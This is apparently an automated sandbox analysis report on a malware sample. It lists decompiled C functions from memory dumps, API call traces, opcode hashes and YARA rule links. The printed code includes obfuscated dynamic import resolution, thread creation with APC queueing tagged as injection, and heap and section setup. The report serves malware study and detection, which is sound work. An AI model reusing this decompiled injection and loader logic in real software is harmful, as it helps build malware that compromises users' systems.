                                                              • Part of subcall function 0457527F: CloseHandle.KERNEL32(00000000,?,?,045613A2,00000000,0458C16C,00000000,?), ref: 045752BE
                                                            • ResumeThread.KERNEL32(?,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,73B74EE0,00000000), ref: 04579573
                                                            • WaitForSingleObject.KERNEL32(00000064), ref: 04579581
                                                            • SuspendThread.KERNEL32(?), ref: 04579594
                                                              • Part of subcall function 0457969C: memset.NTDLL ref: 0457995D
                                                            • ResumeThread.KERNELBASE(?), ref: 04579617
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Thread$ProcessResumememset$CloseHandleObjectOpenSingleSuspendWaitWow64
                                                            • String ID:
                                                            • API String ID: 568453049-0
                                                            • Opcode ID: 8617506ba26e26180b75f1425927475de4e5944dc05200b4b5c2d419bb0430f2
                                                            • Instruction ID: 83f04ca37ac2badef36c39932f69fce7f3dc65e1fcfe5c19d70b29c2d973688a
                                                            • Opcode Fuzzy Hash: 8617506ba26e26180b75f1425927475de4e5944dc05200b4b5c2d419bb0430f2
                                                            • Instruction Fuzzy Hash: 0141AEB2900219AFEF21AF64EC84EAE7BB9FF44354F104439E905A6110DB35EE54EB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD19B4, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00DD740B: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,039C89D0,00DD19E4,?,?,?,?,?,?,?,?,?,?,?,00DD19E4), ref: 00DD74D7
                                                              • Part of subcall function 00DD2AA4: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 00DD2AE1
                                                              • Part of subcall function 00DD2AA4: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 00DD2B12
                                                            • SysAllocString.OLEAUT32(?), ref: 00DD1A10
                                                            • SysAllocString.OLEAUT32(0070006F), ref: 00DD1A24
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00DD1A36
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD1A9A
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD1AA9
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD1AB4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                                            • String ID:
                                                            • API String ID: 2831207796-0
                                                            • Opcode ID: 1f4c821dece6634a186be3879bd2fb8322d8639a16a1abed05c2a04d96a22d5f
                                                            • Instruction ID: c650e65466a18ddd99679a41e2f771acf870917fe8d6b7a9a53b375feb475204
                                                            • Opcode Fuzzy Hash: 1f4c821dece6634a186be3879bd2fb8322d8639a16a1abed05c2a04d96a22d5f
                                                            • Instruction Fuzzy Hash: A9314E36D01609AFDB01DFA8D844AAFB7B6EF49310F154466ED10EB220DB719D06CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457A74F, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(0457C495,?,?,00000402,0457C495,04588570,00000018,0456A0D1,?,00000402,0458B7A4,0458B7A0,-0000000C,00000000), ref: 0457A792
                                                            • VirtualProtect.KERNELBASE(00000000,00000004,0457C495,0457C495,00000000,00000004,0457C495,0458B7A4,0457C495,?,?,00000402,0457C495,04588570,00000018,0456A0D1), ref: 0457A81D
                                                            • RtlEnterCriticalSection.NTDLL(0458C300), ref: 0457A845
                                                            • RtlLeaveCriticalSection.NTDLL(0458C300), ref: 0457A863
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                                            • String ID:
                                                            • API String ID: 3666628472-0
                                                            • Opcode ID: fd27e26ead861c90b480edd49d28e7eb603d726d203e90349a8e424c39ddf6c1
                                                            • Instruction ID: 00bedb84f4c7cba42283f14a4d4240f8ea28f0d2dfee5a59a5e746879d4bbafa
                                                            • Opcode Fuzzy Hash: fd27e26ead861c90b480edd49d28e7eb603d726d203e90349a8e424c39ddf6c1
                                                            • Instruction Fuzzy Hash: 45415E71900615EFDB11DFA5D884A9EBBF4FF48340B108529E516E7250DB74BE41EFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B165D, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E6E4B165D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E4B2102(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e4b41d0 + 0x6e4b5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e4b41d0 + 0x6e4b50e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E4B2117(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e4b41d0 + 0x6e4b50f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e4b41d0 + 0x6e4b5104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e4b41d0 + 0x6e4b5119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e4b41d0 + 0x6e4b512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E4B2013(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                                            0x6e4b166b
                                                            0x6e4b166f
                                                            0x6e4b1730
                                                            0x6e4b1675
                                                            0x6e4b168d
                                                            0x6e4b169c
                                                            0x6e4b16a3
                                                            0x6e4b16a7
                                                            0x6e4b16aa
                                                            0x6e4b1728
                                                            0x6e4b1729
                                                            0x6e4b16ac
                                                            0x6e4b16b9
                                                            0x6e4b16bd
                                                            0x6e4b16c0
                                                            0x00000000
                                                            0x6e4b16c2
                                                            0x6e4b16cf
                                                            0x6e4b16d3
                                                            0x6e4b16d6
                                                            0x00000000
                                                            0x6e4b16d8
                                                            0x6e4b16e5
                                                            0x6e4b16e9
                                                            0x6e4b16ec
                                                            0x00000000
                                                            0x6e4b16ee
                                                            0x6e4b16fb
                                                            0x6e4b16ff
                                                            0x6e4b1702
                                                            0x00000000
                                                            0x6e4b1704
                                                            0x6e4b170a
                                                            0x6e4b1710
                                                            0x6e4b1715
                                                            0x6e4b171c
                                                            0x6e4b171f
                                                            0x00000000
                                                            0x6e4b1721
                                                            0x6e4b1724
                                                            0x6e4b1724
                                                            0x6e4b171f
                                                            0x6e4b1702
                                                            0x6e4b16ec
                                                            0x6e4b16d6
                                                            0x6e4b16c0
                                                            0x6e4b16aa
                                                            0x6e4b173e

                                                            APIs
                                                              • Part of subcall function 6E4B2102: HeapAlloc.KERNEL32(00000000,?,6E4B13AF,?,00000000,00000001,?,?,?,6E4B1A94), ref: 6E4B210E
                                                            • GetModuleHandleA.KERNEL32(?,00000020), ref: 6E4B1681
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16A3
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16B9
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16CF
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16E5
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16FB
                                                              • Part of subcall function 6E4B2013: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 6E4B2070
                                                              • Part of subcall function 6E4B2013: memset.NTDLL ref: 6E4B2092
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                            • String ID:
                                                            • API String ID: 1632424568-0
                                                            • Opcode ID: 242e4e89e1c3d3cb9dca64a5b8af9023ce77fb7ba9d496120e40756aae42913d
                                                            • Instruction ID: 186de4d6f4302fee20d8e898ec877abea18fb1bb79dd4aba28bff673c8b7bd4e
                                                            • Opcode Fuzzy Hash: 242e4e89e1c3d3cb9dca64a5b8af9023ce77fb7ba9d496120e40756aae42913d
                                                            • Instruction Fuzzy Hash: F7217FB590060AAFDB50EFB9E884E5A77FCEF46284B004466E945E7301E735E916CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD2039, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD2039(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00DD77D7(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xdda2d4; // 0x2bed5a8
					_t1 = _t23 + 0xddb11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xdda2d4; // 0x2bed5a8
					_t2 = _t26 + 0xddb787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00DD77EC(_t54);
					} else {
						_t30 =  *0xdda2d4; // 0x2bed5a8
						_t5 = _t30 + 0xddb774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xdda2d4; // 0x2bed5a8
							_t7 = _t33 + 0xddb797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xdda2d4; // 0x2bed5a8
								_t9 = _t36 + 0xddb756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xdda2d4; // 0x2bed5a8
									_t11 = _t39 + 0xddb7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00DD3C64(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                            0x00dd2048
                                                            0x00dd204c
                                                            0x00dd210e
                                                            0x00dd2052
                                                            0x00dd2052
                                                            0x00dd2057
                                                            0x00dd206a
                                                            0x00dd206c
                                                            0x00dd2071
                                                            0x00dd2079
                                                            0x00dd2080
                                                            0x00dd2084
                                                            0x00dd2087
                                                            0x00dd2106
                                                            0x00dd2107
                                                            0x00dd2089
                                                            0x00dd2089
                                                            0x00dd208e
                                                            0x00dd2096
                                                            0x00dd209a
                                                            0x00dd209d
                                                            0x00000000
                                                            0x00dd209f
                                                            0x00dd209f
                                                            0x00dd20a4
                                                            0x00dd20ac
                                                            0x00dd20b0
                                                            0x00dd20b3
                                                            0x00000000
                                                            0x00dd20b5
                                                            0x00dd20b5
                                                            0x00dd20ba
                                                            0x00dd20c2
                                                            0x00dd20c6
                                                            0x00dd20c9
                                                            0x00000000
                                                            0x00dd20cb
                                                            0x00dd20cb
                                                            0x00dd20d0
                                                            0x00dd20d8
                                                            0x00dd20dc
                                                            0x00dd20df
                                                            0x00000000
                                                            0x00dd20e1
                                                            0x00dd20e7
                                                            0x00dd20ec
                                                            0x00dd20f3
                                                            0x00dd20fa
                                                            0x00dd20fd
                                                            0x00000000
                                                            0x00dd20ff
                                                            0x00dd2102
                                                            0x00dd2102
                                                            0x00dd20fd
                                                            0x00dd20df
                                                            0x00dd20c9
                                                            0x00dd20b3
                                                            0x00dd209d
                                                            0x00dd2087
                                                            0x00dd211c

                                                            APIs
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00DD4BF5,?,?,?,?,00000000,00000000), ref: 00DD205E
                                                            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00DD2080
                                                            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00DD2096
                                                            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00DD20AC
                                                            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00DD20C2
                                                            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00DD20D8
                                                              • Part of subcall function 00DD3C64: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,00DD20F8), ref: 00DD3CC1
                                                              • Part of subcall function 00DD3C64: memset.NTDLL ref: 00DD3CE3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                            • String ID:
                                                            • API String ID: 3012371009-0
                                                            • Opcode ID: 4abca739db59480653d0db6aee919aaaf83d10603bd272fe5bd05bccd66e08f9
                                                            • Instruction ID: e0b10b7089849fb309680e8833004982d17e307491881cc46fb852d7cc34582e
                                                            • Opcode Fuzzy Hash: 4abca739db59480653d0db6aee919aaaf83d10603bd272fe5bd05bccd66e08f9
                                                            • Instruction Fuzzy Hash: E32135B160130AEFDB10DF69CE85E6A7BECEB48344B058467E949C7352E735E9058B70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B17C4, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 86%
                                                            			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e4b4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e4b418c;
						if( *0x6e4b418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e4b4198;
								if( *0x6e4b4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e4b418c);
						}
						HeapDestroy( *0x6e4b4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e4b4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6e4b4190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e4b41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E4B1000(E6E4B1FC9, E6E4B19C4(_a12, 1, 0x6e4b4198, _t41));
							 *0x6e4b418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                                            0x6e4b17c7
                                                            0x6e4b17d3
                                                            0x6e4b17d5
                                                            0x6e4b17d8
                                                            0x6e4b184e
                                                            0x6e4b1854
                                                            0x6e4b1856
                                                            0x6e4b1858
                                                            0x6e4b185e
                                                            0x6e4b1860
                                                            0x6e4b1865
                                                            0x6e4b1868
                                                            0x6e4b1873
                                                            0x6e4b1875
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b1877
                                                            0x6e4b187a
                                                            0x6e4b187c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b187c
                                                            0x6e4b1884
                                                            0x6e4b1884
                                                            0x6e4b1890
                                                            0x6e4b1890
                                                            0x6e4b17da
                                                            0x6e4b17db
                                                            0x6e4b17fb
                                                            0x6e4b1801
                                                            0x6e4b1803
                                                            0x6e4b1808
                                                            0x6e4b1844
                                                            0x6e4b1844
                                                            0x6e4b180a
                                                            0x6e4b1812
                                                            0x6e4b1819
                                                            0x6e4b1823
                                                            0x6e4b182f
                                                            0x6e4b1836
                                                            0x6e4b183b
                                                            0x6e4b1840
                                                            0x00000000
                                                            0x6e4b1840
                                                            0x6e4b183b
                                                            0x6e4b1808
                                                            0x6e4b17db
                                                            0x6e4b189d

                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(6E4B4188), ref: 6E4B17E6
                                                            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E4B17FB
                                                              • Part of subcall function 6E4B1000: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E4B4198,6E4B1834), ref: 6E4B1017
                                                              • Part of subcall function 6E4B1000: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E4B102C
                                                              • Part of subcall function 6E4B1000: GetLastError.KERNEL32(00000000), ref: 6E4B1037
                                                              • Part of subcall function 6E4B1000: TerminateThread.KERNEL32(00000000,00000000), ref: 6E4B1041
                                                              • Part of subcall function 6E4B1000: CloseHandle.KERNEL32(00000000), ref: 6E4B1048
                                                              • Part of subcall function 6E4B1000: SetLastError.KERNEL32(00000000), ref: 6E4B1051
                                                            • InterlockedDecrement.KERNEL32(6E4B4188), ref: 6E4B184E
                                                            • SleepEx.KERNEL32(00000064,00000001), ref: 6E4B1868
                                                            • CloseHandle.KERNEL32 ref: 6E4B1884
                                                            • HeapDestroy.KERNEL32 ref: 6E4B1890
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                            • String ID:
                                                            • API String ID: 2110400756-0
                                                            • Opcode ID: 26845f1b4e41920de89ff390f11e187c961b9ed63ab58a5ab3245377e5a60fb7
                                                            • Instruction ID: 8eddd8c9642467362b5ed95fb8660b0c68649375f85bdd7493896bf954bcecf5
                                                            • Opcode Fuzzy Hash: 26845f1b4e41920de89ff390f11e187c961b9ed63ab58a5ab3245377e5a60fb7
                                                            • Instruction Fuzzy Hash: 1D215E71E00A45ABCF40AFFAEC8CE597BB8FF663E5710456AE509D2344E77099068B70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456E0F2, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,04580483), ref: 0456E109
                                                            • QueueUserAPC.KERNELBASE(?,00000000,04575ADA,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E11E
                                                            • GetLastError.KERNEL32(00000000,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E129
                                                            • TerminateThread.KERNEL32(00000000,00000000,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E133
                                                            • CloseHandle.KERNEL32(00000000,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E13A
                                                            • SetLastError.KERNEL32(00000000,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E143
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                            • String ID:
                                                            • API String ID: 3832013932-0
                                                            • Opcode ID: 4bb2d3f95ed624376fb5e9ff2098e5a76ff9f2b2b2a962da4b2b0689be46c2a3
                                                            • Instruction ID: 55c030814c8291992e31dc40ecb47fbd6a3221b5cef2c42867483e22dec7cbc9
                                                            • Opcode Fuzzy Hash: 4bb2d3f95ed624376fb5e9ff2098e5a76ff9f2b2b2a962da4b2b0689be46c2a3
                                                            • Instruction Fuzzy Hash: 35F01C32605221EBD7225FA0AC48F5FBEA9FF08752F05541CF606B1251DB399C18BBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B1000, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E6E4B1000(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e4b41cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                                            0x6e4b1017
                                                            0x6e4b101d
                                                            0x6e4b1021
                                                            0x6e4b102c
                                                            0x6e4b1034
                                                            0x6e4b103d
                                                            0x6e4b1041
                                                            0x6e4b1048
                                                            0x6e4b104f
                                                            0x6e4b1051
                                                            0x6e4b1057
                                                            0x6e4b1034
                                                            0x6e4b105b

                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E4B4198,6E4B1834), ref: 6E4B1017
                                                            • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E4B102C
                                                            • GetLastError.KERNEL32(00000000), ref: 6E4B1037
                                                            • TerminateThread.KERNEL32(00000000,00000000), ref: 6E4B1041
                                                            • CloseHandle.KERNEL32(00000000), ref: 6E4B1048
                                                            • SetLastError.KERNEL32(00000000), ref: 6E4B1051
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                            • String ID:
                                                            • API String ID: 3832013932-0
                                                            • Opcode ID: 55152de37d06eaf167af31a66ed38fbb3e53e0d6833b3c49909e0f9ef3b1b73f
                                                            • Instruction ID: b6d2115efb162498cd002e49e893e36e5c66710586667bbff5477d06233e09f0
                                                            • Opcode Fuzzy Hash: 55152de37d06eaf167af31a66ed38fbb3e53e0d6833b3c49909e0f9ef3b1b73f
                                                            • Instruction Fuzzy Hash: 44F08232908E21BBCB216FB6AC4CF4BBF68FF0A752F004405FA0591148D7B198189BA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD5AFA, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 88%
                                                            			E00DD5AFA(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0xdda38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E00DD5691( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E00DD611E(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E00DD77EC(_a8);
						goto L29;
					}
					_t64 =  *0xdda2cc; // 0x39c9d00
					_t16 = _t64 + 0xc; // 0x39c9df4
					_t65 = E00DD5691(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d00dd90, executed
						_t67 = E00DD2A18(_t97,  *_t33, _t91, _a8,  *0xdda384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0xdda2d4; // 0x2bed5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0xddb9ef; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0xddb907; // 0x55434b48
								_t69 = _t34;
							}
							if(E00DD3D9E(_t69,  *0xdda384,  *0xdda388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0xdda2d4; // 0x2bed5a8
									_t44 = _t71 + 0xddb892; // 0x74666f53
									_t73 = E00DD5691(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d00dd90
										E00DD2A5C( *_t47, _t91, _a8,  *0xdda388, _a24);
										_t49 = _t101 + 0x10; // 0x3d00dd90
										E00DD2A5C( *_t49, _t91, _t99,  *0xdda380, _a16);
										E00DD77EC(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d00dd90
									E00DD2A5C( *_t40, _t91, _a8,  *0xdda388, _a24);
									_t43 = _t101 + 0x10; // 0x3d00dd90, executed
									E00DD2A5C( *_t43, _t91, _a8,  *0xdda380, _a16); // executed
								}
								if( *_t101 != 0) {
									E00DD77EC(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d00dd90, executed
					_t81 = E00DD15D7( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d00dd90
